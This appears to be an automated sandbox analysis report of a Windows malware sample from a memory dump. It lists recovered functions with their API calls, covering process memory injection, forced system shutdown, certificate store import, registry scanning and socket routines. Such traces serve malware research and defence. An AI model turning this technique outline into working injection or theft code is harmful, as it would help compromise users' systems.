GetThreadDesktop.USER32(00000000), ref: 0003E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0003E128

Part of subcall function 0003DD09: TlsAlloc.KERNEL32(00052868,00000000,0000018C,00000000,00000000), ref: 0003DD22
Part of subcall function 0003DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0003DD4A
Part of subcall function 0003DD09: CreateEventW.KERNEL32(00052C30,00000001,00000000,?,84889912,?,00000001), ref: 0003DD74
Part of subcall function 0003DD09: CreateMutexW.KERNEL32(00052C30,00000000,?,18782822,?,00000001), ref: 0003DD97
Part of subcall function 0003DD09: CreateFileMappingW.KERNEL32(00000000,00052C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0003DDC2
Part of subcall function 0003DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0003DDD8
Part of subcall function 0003DD09: GetDC.USER32(00000000), ref: 0003DDF5
Part of subcall function 0003DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0003DE15
Part of subcall function 0003DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0003DE1F
Part of subcall function 0003DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0003DE32
Part of subcall function 0003DD09: ReleaseDC.USER32(00000000,?), ref: 0003DE56
Part of subcall function 0003DD09: CreateMutexW.KERNEL32(00052C30,00000000,?,1898B122,?,00000001,000528B8,?,00000102,000528A4,00052E70,00000010,?,?), ref: 0003DF00
Part of subcall function 0003DD09: GetDC.USER32(00000000), ref: 0003DF15
Part of subcall function 0003DD09: CreateCompatibleDC.GDI32(00000000), ref: 0003DF23
Part of subcall function 0003DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0003DF3A
Part of subcall function 0003DD09: SelectObject.GDI32(00000000,00000000), ref: 0003DF4D
Part of subcall function 0003DD09: ReleaseDC.USER32(00000000,00000001), ref: 0003DF65

Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DF87
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DF97
Part of subcall function 0003DF74: TlsFree.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFA2
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFB0
Part of subcall function 0003DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFBA
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFC7
Part of subcall function 0003DF74: SelectObject.GDI32(00000000,00000000), ref: 0003DFE1
Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DFF2
Part of subcall function 0003DF74: DeleteDC.GDI32(00000000), ref: 0003DFFF
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003E010
Part of subcall function 0003DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0003E01F
Part of subcall function 0003DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0003E038

Strings

N, xrefs: 0003E132

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000487C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 000487D7

Part of subcall function 000446F4: GetTickCount.KERNEL32(00048766,?), ref: 000446F4

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00048829

Strings

tmp, xrefs: 000487ED
%s%08x, xrefs: 000487F2

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000489C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 000489CD
GetFileAttributesW.KERNEL32(?,?,00000000,0004D261,?,?,?,?,?), ref: 000489F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0004D261,?,?,?,?,?), ref: 00048A03

Strings

.exe, xrefs: 000489C9

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(000525D0), ref: 00035F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00035F23

Part of subcall function 000489C2: PathSkipRootW.SHLWAPI(?), ref: 000489CD
Part of subcall function 000489C2: GetFileAttributesW.KERNEL32(?,?,00000000,0004D261,?,?,?,?,?), ref: 000489F5
Part of subcall function 000489C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0004D261,?,?,?,?,?), ref: 00048A03

Part of subcall function 00046A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00046A5B
Part of subcall function 00046A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00046A77
Part of subcall function 00046A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00046A8E
Part of subcall function 00046A3C: LocalFree.KERNEL32(00000000), ref: 00046A9D

GetFileAttributesW.KERNEL32(000523C8,000525D0,000525D0,00000000,00020000,000369C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00035F46

Part of subcall function 00042828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

Strings

.tmp, xrefs: 00035F1D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0003F3CC

Part of subcall function 0004D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0004D34A
Part of subcall function 0004D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0004D35D
Part of subcall function 0004D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0004D39B
Part of subcall function 0004D325: CharToOemW.USER32(?,?), ref: 0004D3B7
Part of subcall function 0004D325: CharToOemW.USER32(?,?), ref: 0004D3C6
Part of subcall function 0004D325: ExitProcess.KERNEL32(00000000), ref: 0004D41C

Part of subcall function 0003E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00034E69,?,?,743C152E,00000002), ref: 0003E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0003F3DF

Part of subcall function 00044A87: GetCurrentThread.KERNEL32(00000020,00000000,0004C9A1,00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A97
Part of subcall function 00044A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044A9E
Part of subcall function 00044A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0004C9A1,?,?,?,?,0004C9A1,SeTcbPrivilege), ref: 00044AB0
Part of subcall function 00044A87: LookupPrivilegeValueW.ADVAPI32(00000000,0004C9A1,?), ref: 00044AD4
Part of subcall function 00044A87: AdjustTokenPrivileges.ADVAPI32(0004C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00044AE9
Part of subcall function 00044A87: GetLastError.KERNEL32 ref: 00044AF3
Part of subcall function 00044A87: CloseHandle.KERNEL32(0004C9A1), ref: 00044B02

Strings

, xrefs: 0003F383
SeShutdownPrivilege, xrefs: 0003F3AB

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00041E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00041E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00041E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00041E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00041E3D, 00041E42, 00041E59

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00041DBB,00000000,000422ED), ref: 00044BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00041DBB,00000000,000422ED), ref: 00044BDF

Strings

IsWow64Process, xrefs: 00044BD9
kernel32.dll, xrefs: 00044BCA

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(00053F24), ref: 0004A265
SetEvent.KERNEL32(?), ref: 0004A286
LeaveCriticalSection.KERNEL32(00053F24), ref: 0004A28D

Strings

3, xrefs: 0004A256

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00040AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00040CB5

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

Part of subcall function 00044660: CryptAcquireContextW.ADVAPI32(00048C87,00000000,00000000,00000001,F0000040,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044679
Part of subcall function 00044660: CryptCreateHash.ADVAPI32(00048C87,00008003,00000000,00000000,00000030,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044691
Part of subcall function 00044660: CryptHashData.ADVAPI32(00000030,00000010,00048C87,00000000,?,00048C87), ref: 000446AD
Part of subcall function 00044660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00048C87), ref: 000446C5
Part of subcall function 00044660: CryptDestroyHash.ADVAPI32(00000030,?,00048C87), ref: 000446DC
Part of subcall function 00044660: CryptReleaseContext.ADVAPI32(00048C87,00000000,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 000446E6

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0003A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0003A159
RegCloseKey.ADVAPI32(?), ref: 0003A28F

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

Part of subcall function 00047595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00049E26,?,?), ref: 000475AD

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0003A27C

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0003A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0003A6D5
RegCloseKey.ADVAPI32(?), ref: 0003A80C

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

Part of subcall function 00047595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00049E26,?,?), ref: 000475AD

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0003A7F9

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0004B28C

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0004B2E0

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0004B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0004B36F

Part of subcall function 0004B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0004B437
Part of subcall function 0004B3EC: WriteFile.KERNEL32(0004B3D4,?,00000146,?,00000000), ref: 0004B475
Part of subcall function 0004B3EC: WriteFile.KERNEL32(0004B3D4,?,00000000,?,00000000), ref: 0004B499
Part of subcall function 0004B3EC: FlushFileBuffers.KERNEL32(0004B3D4), ref: 0004B4AD
Part of subcall function 0004B3EC: CloseHandle.KERNEL32(0004B3D4), ref: 0004B4B6

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(00030000,?), ref: 00047D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00047D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00030000,?,?,00000000,?,00000000), ref: 00047DE0

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00030000,?,?,00000000,?,00000000), ref: 00047E05

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 00047D14: IsBadReadPtr.KERNEL32(00030000,?), ref: 00047D30
Part of subcall function 00047D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00047D4E
Part of subcall function 00047D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00030000,?,?,00000000,?,00000000), ref: 00047DE0
Part of subcall function 00047D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00030000,?,?,00000000,?,00000000), ref: 00047E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00042574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425CB

Part of subcall function 00041D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00041D3B
Part of subcall function 00041D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,000425E9,00000000,?,?,?,?,0004316D,?), ref: 00041D4F
Part of subcall function 00041D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00041D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0004316D,?,00000000), ref: 0004261A

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(000315B0,00000000,00004401,000315A0,?), ref: 00049874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,000385BE,?,?), ref: 000498C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,000385BE,?,?), ref: 000498D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,000385BE,?,?), ref: 00049909

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00049372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 000486BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000486D4

Part of subcall function 0004869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 000486B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 000493F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0004940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00049430
FlushFileBuffers.KERNEL32(?), ref: 00049438

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00035B40

Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DD9
Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DE2

Part of subcall function 00042828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00035B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00035BD6
TerminateProcess.KERNEL32(?,00000000), ref: 00035BE3

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0003BB89
SetThreadPriority.KERNEL32(00000000), ref: 0003BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0003BBA8

Part of subcall function 000431CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000431ED
Part of subcall function 000431CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00043216
Part of subcall function 000431CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00043271
Part of subcall function 000431CC: CloseHandle.KERNEL32(00000000), ref: 0004328E
Part of subcall function 000431CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000432A1
Part of subcall function 000431CC: CloseHandle.KERNEL32(?), ref: 0004330E
Part of subcall function 000431CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0004331A
Part of subcall function 000431CC: CloseHandle.KERNEL32(000001E6), ref: 0004332B

WaitForSingleObject.KERNEL32(00001388), ref: 0003BBBD

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00046B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 00046B4A
DispatchMessageW.USER32(?), ref: 00046B55
PeekMessageW.USER32(00000000), ref: 00046B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00046B79

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00044A3D
Thread32First.KERNEL32(00000000,?), ref: 00044A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 00044A6E
CloseHandle.KERNEL32(00000000), ref: 00044A79

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 00046973: getsockname.WS2_32(?,?,?), ref: 00046991

Part of subcall function 0004636E: recv.WS2_32(?,?,00000004,00000000), ref: 00046392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 000404DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00040515

Part of subcall function 000464FD: socket.WS2_32(00000000,00000001,00000006), ref: 00046506
Part of subcall function 000464FD: bind.WS2_32(00000000,?,-0000001D), ref: 00046526
Part of subcall function 000464FD: listen.WS2_32(00000000,?), ref: 00046535
Part of subcall function 000464FD: #3.WS2_32(00000000,?,00034C21,7FFFFFFF,?,00000000,00000080), ref: 00046540

Part of subcall function 0004672E: accept.WS2_32(00000000,00000000,00000001), ref: 00046754

Part of subcall function 00046403: socket.WS2_32(?,00000001,00000006), ref: 0004640C
Part of subcall function 00046403: connect.WS2_32(00000000,?,-0000001D), ref: 0004642C
Part of subcall function 00046403: #3.WS2_32(00000000,?,?,?,00037518,?), ref: 00046437

Part of subcall function 000467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000467CC

Part of subcall function 000465B7: recv.WS2_32(?,?,00000400,00000000), ref: 00046600
Part of subcall function 000465B7: #19.WS2_32(?,?,00000000,00000000), ref: 0004661A
Part of subcall function 000465B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00046657

Part of subcall function 0004675E: shutdown.WS2_32(00000000,00000002), ref: 00046766
Part of subcall function 0004675E: #3.WS2_32(00000000), ref: 0004676D

Part of subcall function 00040397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 000403BB
Part of subcall function 00040397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 000403CA

Strings

Z, xrefs: 0004064F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 000446F4: GetTickCount.KERNEL32(00048766,?), ref: 000446F4

CharUpperW.USER32(00000000), ref: 0004785B

Strings

.exe, xrefs: 00047745
bcdfghklmnpqrstvwxz, xrefs: 00047759

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0004D664

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

GetSystemTime.KERNEL32(?), ref: 0004D6B0

Part of subcall function 0004D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0004D581,?,?,00000000), ref: 0004D43F

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Strings

.txt, xrefs: 0004D746

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A594, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97

APIs

Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00045505
Part of subcall function 000454F1: GetLastError.KERNEL32 ref: 0004550F
Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0004552F

Part of subcall function 000455A1: HttpQueryInfoA.WININET(?,?,?,?,00000000), ref: 000455BA
Part of subcall function 000455A1: GetLastError.KERNEL32(?,00000000), ref: 000455C0
Part of subcall function 000455A1: HttpQueryInfoA.WININET(?,?,00000000,?,00000000), ref: 000455E2

HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0004A5F4

Part of subcall function 00045547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 0004555D
Part of subcall function 00045547: GetLastError.KERNEL32(?,0004A663,?,0000001C,?,00000000,00000048), ref: 00045567
Part of subcall function 00045547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 00045589

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00036BD7: RegOpenKeyExW.ADVAPI32(80000001,000527F0,00000000,00000001,?,?), ref: 00036C00

Part of subcall function 00049A9E: RegOpenKeyExW.ADVAPI32(80000001,00053EC0,00000000,00000001,?), ref: 00049ADD

Strings

n&<&F&, xrefs: 0004A5F4
G, xrefs: 0004A615

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00037EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(000316C0,00000000,00004401,000316D0,?), ref: 00037F29
CoCreateInstance.OLE32(00031690,00000000,00004401,000316A0,?), ref: 00037F7C

Strings

D, xrefs: 00037FA7

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047A14, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 00047AB5

Strings

Global\, xrefs: 00047A91
Local\, xrefs: 00047A9A

